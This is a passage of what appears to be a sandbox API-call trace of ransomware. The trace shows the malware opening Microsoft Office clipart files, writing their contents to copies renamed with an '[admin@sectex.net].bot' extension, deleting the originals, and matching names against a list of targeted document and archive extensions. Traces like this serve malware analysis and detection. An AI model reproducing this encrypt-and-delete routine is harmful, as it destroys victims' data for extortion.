	[0145.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.601] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.601] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.602] GetLastError () returned 0x0
	[0145.602] ReadFile (in: hFile=0x3a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x439c, lpOverlapped=0x0) returned 1
	[0145.604] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x43a0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x43a0, lpOverlapped=0x0) returned 1
	[0145.605] ReadFile (in: hFile=0x3a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.605] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.605] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.605] CloseHandle (hObject=0x3d4) returned 1
	[0145.605] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.605] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.607] CloseHandle (hObject=0x3a0) returned 1
	[0145.608] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.608] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf")) returned 1
	[0145.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.608] lstrlenW (lpString=".doc") returned 4
	[0145.608] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.608] lstrlenW (lpString=".docx") returned 5
	[0145.608] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.608] lstrlenW (lpString=".pdf") returned 4
	[0145.608] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.608] lstrlenW (lpString=".xls") returned 4
	[0145.609] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.609] lstrlenW (lpString=".xlsx") returned 5
	[0145.609] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.609] lstrlenW (lpString=".ppt") returned 4
	[0145.609] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.609] lstrlenW (lpString=".zip") returned 4
	[0145.609] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.609] lstrlenW (lpString=".rar") returned 4
	[0145.609] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.609] lstrlenW (lpString=".bz2") returned 4
	[0145.609] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.609] lstrlenW (lpString=".7z") returned 3
	[0145.609] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.609] lstrlenW (lpString=".dbf") returned 4
	[0145.609] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.609] lstrlenW (lpString=".1cd") returned 4
	[0145.609] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.609] lstrlenW (lpString=".jpg") returned 4
	[0145.609] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.609] lstrlenW (lpString=".doc") returned 4
	[0145.609] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.609] lstrlenW (lpString=".docx") returned 5
	[0145.609] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.609] lstrlenW (lpString=".pdf") returned 4
	[0145.609] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.609] lstrlenW (lpString=".xls") returned 4
	[0145.609] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.610] lstrlenW (lpString=".xlsx") returned 5
	[0145.610] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.610] lstrlenW (lpString=".ppt") returned 4
	[0145.610] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.610] lstrlenW (lpString=".zip") returned 4
	[0145.610] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.610] lstrlenW (lpString=".rar") returned 4
	[0145.610] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.610] lstrlenW (lpString=".bz2") returned 4
	[0145.610] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.610] lstrlenW (lpString=".7z") returned 3
	[0145.610] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.610] lstrlenW (lpString=".dbf") returned 4
	[0145.610] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.610] lstrlenW (lpString=".1cd") returned 4
	[0145.610] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 63
	[0145.610] lstrlenW (lpString=".jpg") returned 4
	[0145.610] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.610] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.610] lstrlenW (lpString="EN00902_.WMF") returned 12
	[0145.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.656] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7944) returned 1
	[0145.656] CloseHandle (hObject=0x31c) returned 1
	[0145.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf")) returned 0x20
	[0145.681] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.753] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.753] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0145.753] GetLastError () returned 0x0
	[0145.754] ReadFile (in: hFile=0x38c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1f08, lpOverlapped=0x0) returned 1
	[0145.773] WriteFile (in: hFile=0x3bc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1f10, lpOverlapped=0x0) returned 1
	[0145.774] ReadFile (in: hFile=0x38c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.774] WriteFile (in: hFile=0x3bc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.775] SetEndOfFile (hFile=0x3bc) returned 1
	[0145.775] CloseHandle (hObject=0x3bc) returned 1
	[0145.775] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.775] SetEndOfFile (hFile=0x38c) returned 1
	[0145.777] CloseHandle (hObject=0x38c) returned 1
	[0145.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf")) returned 1
	[0145.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.862] lstrlenW (lpString=".doc") returned 4
	[0145.862] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.862] lstrlenW (lpString=".docx") returned 5
	[0145.862] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.862] lstrlenW (lpString=".pdf") returned 4
	[0145.862] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.862] lstrlenW (lpString=".xls") returned 4
	[0145.862] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.862] lstrlenW (lpString=".xlsx") returned 5
	[0145.862] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.862] lstrlenW (lpString=".ppt") returned 4
	[0145.863] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.863] lstrlenW (lpString=".zip") returned 4
	[0145.863] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.863] lstrlenW (lpString=".rar") returned 4
	[0145.863] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.863] lstrlenW (lpString=".bz2") returned 4
	[0145.863] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.863] lstrlenW (lpString=".7z") returned 3
	[0145.863] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.863] lstrlenW (lpString=".dbf") returned 4
	[0145.863] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.863] lstrlenW (lpString=".1cd") returned 4
	[0145.863] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.863] lstrlenW (lpString=".jpg") returned 4
	[0145.863] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.863] lstrlenW (lpString=".doc") returned 4
	[0145.863] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.863] lstrlenW (lpString=".docx") returned 5
	[0145.863] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.863] lstrlenW (lpString=".pdf") returned 4
	[0145.863] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.863] lstrlenW (lpString=".xls") returned 4
	[0145.863] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.863] lstrlenW (lpString=".xlsx") returned 5
	[0145.863] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.863] lstrlenW (lpString=".ppt") returned 4
	[0145.863] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.864] lstrlenW (lpString=".zip") returned 4
	[0145.864] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.864] lstrlenW (lpString=".rar") returned 4
	[0145.864] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.864] lstrlenW (lpString=".bz2") returned 4
	[0145.864] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.864] lstrlenW (lpString=".7z") returned 3
	[0145.864] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.864] lstrlenW (lpString=".dbf") returned 4
	[0145.864] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.864] lstrlenW (lpString=".1cd") returned 4
	[0145.864] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63
	[0145.864] lstrlenW (lpString=".jpg") returned 4
	[0145.864] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.864] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.864] lstrlenW (lpString="FD00296_.WMF") returned 12
	[0145.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.865] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=15856) returned 1
	[0145.865] CloseHandle (hObject=0x3d8) returned 1
	[0145.865] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf")) returned 0x20
	[0145.865] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.865] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.865] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0145.866] GetLastError () returned 0x0
	[0145.866] ReadFile (in: hFile=0x3d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3df0, lpOverlapped=0x0) returned 1
	[0145.891] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3e00, lpOverlapped=0x0) returned 1
	[0145.892] ReadFile (in: hFile=0x3d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.892] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.892] SetEndOfFile (hFile=0x398) returned 1
	[0145.892] CloseHandle (hObject=0x398) returned 1
	[0145.892] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.892] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.894] CloseHandle (hObject=0x3d8) returned 1
	[0145.895] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.897] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf")) returned 1
	[0145.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.927] lstrlenW (lpString=".doc") returned 4
	[0145.927] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.927] lstrlenW (lpString=".docx") returned 5
	[0145.927] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.927] lstrlenW (lpString=".pdf") returned 4
	[0145.927] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.927] lstrlenW (lpString=".xls") returned 4
	[0145.927] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.927] lstrlenW (lpString=".xlsx") returned 5
	[0145.927] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.927] lstrlenW (lpString=".ppt") returned 4
	[0145.927] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.927] lstrlenW (lpString=".zip") returned 4
	[0145.927] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.927] lstrlenW (lpString=".rar") returned 4
	[0145.927] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.927] lstrlenW (lpString=".bz2") returned 4
	[0145.927] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.927] lstrlenW (lpString=".7z") returned 3
	[0145.927] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.928] lstrlenW (lpString=".dbf") returned 4
	[0145.928] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.928] lstrlenW (lpString=".1cd") returned 4
	[0145.928] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.928] lstrlenW (lpString=".jpg") returned 4
	[0145.928] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.928] lstrlenW (lpString=".doc") returned 4
	[0145.928] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.928] lstrlenW (lpString=".docx") returned 5
	[0145.928] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.928] lstrlenW (lpString=".pdf") returned 4
	[0145.928] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.928] lstrlenW (lpString=".xls") returned 4
	[0145.928] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.928] lstrlenW (lpString=".xlsx") returned 5
	[0145.928] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.928] lstrlenW (lpString=".ppt") returned 4
	[0145.928] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.928] lstrlenW (lpString=".zip") returned 4
	[0145.928] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.928] lstrlenW (lpString=".rar") returned 4
	[0145.928] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.928] lstrlenW (lpString=".bz2") returned 4
	[0145.928] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.928] lstrlenW (lpString=".7z") returned 3
	[0145.928] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.928] lstrlenW (lpString=".dbf") returned 4
	[0145.928] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.929] lstrlenW (lpString=".1cd") returned 4
	[0145.929] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 63
	[0145.929] lstrlenW (lpString=".jpg") returned 4
	[0145.929] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.929] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.929] lstrlenW (lpString="FD00369_.WMF") returned 12
	[0145.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0145.930] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=8552) returned 1
	[0145.930] CloseHandle (hObject=0x384) returned 1
	[0145.930] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf")) returned 0x20
	[0145.930] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
